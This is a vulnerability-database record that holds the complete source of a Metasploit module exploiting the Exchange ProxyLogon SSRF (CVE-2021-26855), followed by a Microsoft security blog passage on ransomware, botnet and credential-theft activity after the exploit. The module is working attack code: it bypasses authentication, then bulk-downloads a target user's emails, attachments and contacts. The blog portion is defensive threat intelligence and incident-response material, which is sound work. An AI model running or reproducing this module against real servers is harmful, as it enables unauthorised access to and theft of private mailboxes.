"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-02-23T22:27:12", "id": "MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "href": "https://www.rapid7.com/db/modules/auxiliary/gather/exchange_proxylogon_collector/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon Collector',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft 
Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By taking advantage of this vulnerability, it is possible to dump all\n mailboxes (emails, attachments, contacts, ...).\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'GreyOrder', # PoC (https://github.com/GreyOrder)\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author independent researcher (work at Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/'],\n ['URL', 'https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/distinguishedfolderid'],\n ['URL', 'https://github.com/3gstudent/Homework-of-Python/blob/master/ewsManage.py']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Actions' => [\n [\n 'Dump (Contacts)', {\n 'Description' => 'Dump user contacts from exchange server',\n 'id_attribute' => 'contacts'\n }\n ],\n [\n 'Dump (Emails)', {\n 'Description' => 'Dump user emails from exchange server'\n }\n ]\n ],\n 'DefaultAction' => 'Dump (Emails)',\n 'Notes' => {\n 'AKA' => ['ProxyLogon'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptBool.new('ATTACHMENTS', [true, 'Dump documents attached to an email', true]),\n OptString.new('EMAIL', [true, 'The email account what you want dump']),\n OptString.new('FOLDER', [true, 'The email folder 
what you want dump', 'inbox']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check (only).', 'POST', ['GET', 'POST']]),\n OptString.new('TARGET', [false, 'Force the name of the internal Exchange server targeted'])\n ])\n\n register_advanced_options([\n OptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 2147483647])\n ])\n end\n\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\n\n def dump_contacts(server_name)\n ssrf = \"#{server_name}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\"\n\n response = send_xml('POST', ssrf, soap_countitems(action['id_attribute']))\n if response.body =~ /Success/\n print_good(\"Successfuly connected to: #{action['id_attribute']}\")\n xml = Nokogiri::XML.parse(response.body)\n\n folder_id = xml.at_xpath('//t:ContactsFolder/t:FolderId', XMLNS)&.values&.at(0)\n print_status(\"Selected folder: #{action['id_attribute']} (#{folder_id})\")\n\n total_count = xml.at_xpath('//t:ContactsFolder/t:TotalCount', XMLNS)&.content\n print_status(\"Number of contact found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\"Number of contact recalculated due to max entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n\n response = send_xml('POST', ssrf, soap_listitems(action['id_attribute'], total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n print_status(message(\"Processing dump of #{total_count} items\"))\n data = xml.xpath('//t:Items/t:Contact', XMLNS)\n if data.empty?\n print_status('The user has no contacts')\n else\n write_loot(\"#{datastore['EMAIL']}_#{action['id_attribute']}\", data.to_s)\n end\n end\n end\n\n def dump_emails(server_name)\n ssrf = \"#{server_name}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\"\n\n response = send_xml('POST', ssrf, soap_countitems(datastore['FOLDER']))\n if response.body =~ /Success/\n print_good(\"Successfuly connected to: #{datastore['FOLDER']}\")\n xml = 
Nokogiri::XML.parse(response.body)\n\n folder_id = xml.at_xpath('//t:Folder/t:FolderId', XMLNS)&.values&.at(0)\n print_status(\"Selected folder: #{datastore['FOLDER']} (#{folder_id})\")\n\n total_count = xml.at_xpath('//t:Folder/t:TotalCount', XMLNS)&.content\n print_status(\"Number of emails found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\"Number of emails recalculated due to max entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n\n print_status(message(\"Processing dump of #{total_count} items\"))\n download_items(total_count, ssrf)\n end\n end\n\n def download_attachments(item_id, ssrf)\n response = send_xml('POST', ssrf, soap_listattachments(item_id))\n xml = Nokogiri::XML.parse(response.body)\n\n xml.xpath('//t:Message/t:Attachments/t:FileAttachment', XMLNS).each do |item|\n item_id = item.at_xpath('./t:AttachmentId', XMLNS)&.values&.at(0)\n\n response = send_xml('POST', ssrf, soap_downattachment(item_id))\n data = Nokogiri::XML.parse(response.body)\n\n filename = data.at_xpath('//t:FileAttachment/t:Name', XMLNS)&.content\n ctype = data.at_xpath('//t:FileAttachment/t:ContentType', XMLNS)&.content\n content = data.at_xpath('//t:FileAttachment/t:Content', XMLNS)&.content\n\n print_status(\" -> attachment: #{item_id} (#(unknown))\")\n write_loot(\"#{datastore['EMAIL']}_#{datastore['FOLDER']}\", Rex::Text.decode_base64(content), filename, ctype)\n end\n end\n\n def download_items(total_count, ssrf)\n response = send_xml('POST', ssrf, soap_listitems(datastore['FOLDER'], total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n xml.xpath('//t:Items/t:Message', XMLNS).each do |item|\n item_info = item.at_xpath('./t:ItemId', XMLNS)&.values\n next if item_info.nil?\n\n print_status(\"Download item: #{item_info[1]}\")\n\n response = send_xml('POST', ssrf, soap_downitem(item_info[0], item_info[1]))\n data = Nokogiri::XML.parse(response.body)\n\n email = 
data.at_xpath('//t:Message/t:MimeContent', XMLNS)&.content\n write_loot(\"#{datastore['EMAIL']}_#{datastore['FOLDER']}\", Rex::Text.decode_base64(email))\n\n attachments = item.at_xpath('./t:HasAttachments', XMLNS)&.content\n if datastore['ATTACHMENTS'] && attachments == 'true'\n download_attachments(item_info[0], ssrf)\n end\n print_status\n end\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_xml('POST', \"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\", soap_autodiscover)\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.empty?\n\n server = ''\n owa_urls = []\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n\n next unless type == 'WEB'\n\n item.xpath('./xmlns:Internal/xmlns:OWAUrl', xmlns).each do |owa_url|\n owa_urls << owa_url.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? 
|| server.empty?\n fail_with(Failure::NotFound, 'No \\'OWAUrl\\' was found') if owa_urls.empty?\n\n return([server, legacy_dn, owa_urls])\n end\n\n def send_http(method, ssrf, data: '', ctype: 'application/x-www-form-urlencoded')\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'cookie' => \"X-BEResource=#{ssrf};\",\n 'ctype' => ctype\n }\n request = request.merge({ 'data' => data }) unless data.empty?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def send_xml(method, ssrf, data, ctype: 'text/xml; charset=utf-8')\n send_http(method, ssrf, data: data, ctype: ctype)\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def soap_countitems(folder_id)\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>Default</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"#{folder_id}\">\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_listattachments(item_id)\n <<~SOAP\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n 
xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:AdditionalProperties>\n <t:FieldURI FieldURI=\"item:Attachments\" />\n </t:AdditionalProperties>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{item_id}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_listitems(folder_id, max_entries)\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='#{folder_id}'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_downattachment(item_id)\n <<~SOAP\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetAttachment>\n <m:AttachmentIds>\n <t:AttachmentId Id=\"#{item_id}\" />\n </m:AttachmentIds>\n </m:GetAttachment>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_downitem(id, change_key)\n <<~SOAP\n <?xml version=\"1.0\" 
encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def write_loot(type, data, name = '', ctype = 'text/plain')\n loot_path = store_loot(type, ctype, datastore['RHOSTS'], data, name, '')\n print_good(\"File saved to #{loot_path}\")\n end\n\n def run\n @proto = (ssl ? 'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{Rex::Text.rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n\n # request the internal server name.\n response = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\")\n if response.code != 500 || !response.headers.to_s.include?('X-FEServer')\n fail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found')\n end\n server_name = response.headers['X-FEServer']\n print_status(\"Internal server name (#{server_name})\")\n\n # get information via an autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn, owa_urls = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n print_status(\"Internal target(s): #{owa_urls.join(', ')}\")\n\n # selecting target\n print_status(message('Selecting the first internal server to respond'))\n if datastore['TARGET'].nil? 
|| datastore['TARGET'].empty?\n target = ''\n owa_urls.each do |url|\n host = url.split('://')[1].split('.')[0].downcase\n next unless host != server_name.downcase\n\n response = send_http('GET', \"#{host}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\")\n next unless response.code == 200\n\n target = host\n print_good(\"Targeting internal: #{url}\")\n\n break\n end\n fail_with(Failure::NotFound, 'No internal target was found') if target.empty?\n else\n target = datastore['TARGET']\n print_good(\"Targeting internal forced to: #{target}\")\n end\n\n # run action\n case action.name\n when /Dump \\(Contacts\\)/\n print_status(message(\"Attempt to dump contacts for <#{datastore['EMAIL']}>\"))\n dump_contacts(target)\n when /Dump \\(Emails\\)/\n print_status(message(\"Attempt to dump emails for <#{datastore['EMAIL']}>\"))\n dump_emails(target)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/exchange_proxylogon_collector.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2021-03-26T05:28:04", "description": "Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. 
As of today, we have seen a significant decrease in the number of still-vulnerable servers \u2013 more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.\n\nAs organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads. This blog covers:\n\n * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.\n * Detection and automatic remediation built into Microsoft Defender Antivirus and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.\n\nAlthough the overall numbers of ransomware have remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. 
We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.\n\n## Mitigating post-exploitation activities\n\nThe first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits. In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.\n\n\n\n_Figure 1. The Exchange Server exploit chain_\n\nIn our investigation of the on-premises Exchange Server attacks, we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.\n\nAttackers who included the exploit in their toolkits, whether through modifying public proof of concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. 
Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.\n\nWe have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.\n\nWhile performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and recommendations for prevention and mitigation apply:\n\n * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).\n * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. 
For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n * Credential theft \u2013 While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.\n\nIn the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange server vulnerabilities because it is helpful to understand these TTPs, in order to defend against other actors using similar tactics or tools. While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It\u2019s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.\n\n## DoejoCrypt ransomware\n\nDoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or \u201creseller\u201d who sells access to systems they have already compromised. 
The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.\n\nThe web shell writes a batch file to _C:\\Windows\\Temp\\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.\n\n\n\n_Figure 2. xx.bat_\n\nGiven configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. **As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privileged access.\n\nThe batch file saves the registry hives to a semi-unique location, _C:\\windows\\temp\\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.\n\n\n\n_Figure 3. xx.bat actions_\n\nThe _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. 
On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dropped the xx.bat file (in this instance, a version of Chopper):\n\n\n\n_Figure 4. DoejoCrypt recon command_\n\nAfter these commands are completed, the web shell drops a new payload to _C:\\Windows\\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike shellcode.\n\n\n\n_Figure 5. DoejoCrypt ransomware attack chain_\n\nDuring the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\\Windows\\Help_ with names like _s1.exe_ and _s2.exe_. This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.\n\n\n\n_Figure 6. DoejoCrypt ransom note_\n\nWhile the DoejoCrypt payload is the most visible outcome of the attackers\u2019 actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_\u2014an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.\n\n## Lemon Duck botnet\n\nCryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. 
In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.\n\nLemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks. While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.\n\nUsing a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke-Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.\n\n\n\n_Figure 7. Example executions of Lemon Duck payload downloads_\n\nThe Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and WMI event subscriptions for persistence. 
A second script is downloaded to attempt to evade Microsoft Defender Antivirus, abusing their administrative access to run the _Set-MPPreference_ command to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and add scanning exclusions for the C:\\ drive and the PowerShell process.\n\n\n\n\n\n_Figure 8. Lemon Duck payloads_\n\nOne randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen to download RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.\n\n\n\n_Figure 9. Lemon Duck post-exploitation activities_\n\nIn some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.\n\n\n\n_Figure 10. Email subjects of possibly malicious emails_\n\n\n\n_Figure 11. Attachment variables_\n\nIn one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system in a non-web shell method, the Lemon Duck operators were observed cleaning up other attackers\u2019 presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. 
This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.\n\n## Pydomer ransomware\n\nWhile DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.\n\nIn this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: \u201cChack[Word][Country abbreviation]\u201d:\n\n\n\n_Figure 12. Example web shell names observed being used by the Pydomer attackers_\n\nThese web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to dump a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.\n\n\n\n_Figure 13. Pydomer post-exploitation activities_\n\nThis access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. 
The highly privileged credentials gained from an Exchange system are likely to contain domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched and even enter via different means.\n\nOn systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the ransomware.\n\n\n\n_Figure 14. PowerShell downloader and spreader used to get the Pydomer payload_\n\nThe script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain, and attempts to spread the payload throughout the network, first over WMI, using Invoke-WMIMethod to connect to systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and unrecommended configurations like having computer objects in highly privileged groups.\n\nThe Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.\n\n\n\n_Figure 15. Pydomer ransom note_\n\nInterestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. 
This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.\n\n\n\n_Figure 16. Pydomer extortion readme.txt_\n\n## Credential theft, turf wars, and dogged persistence\n\nIf a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:\n\n\n\n_Figure 17. Use of COM services DLL to dump LSASS process_\n\nThe number of observed credential theft attacks, combined with the high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don\u2019t fully remediate after a compromise even after patches have been applied. 
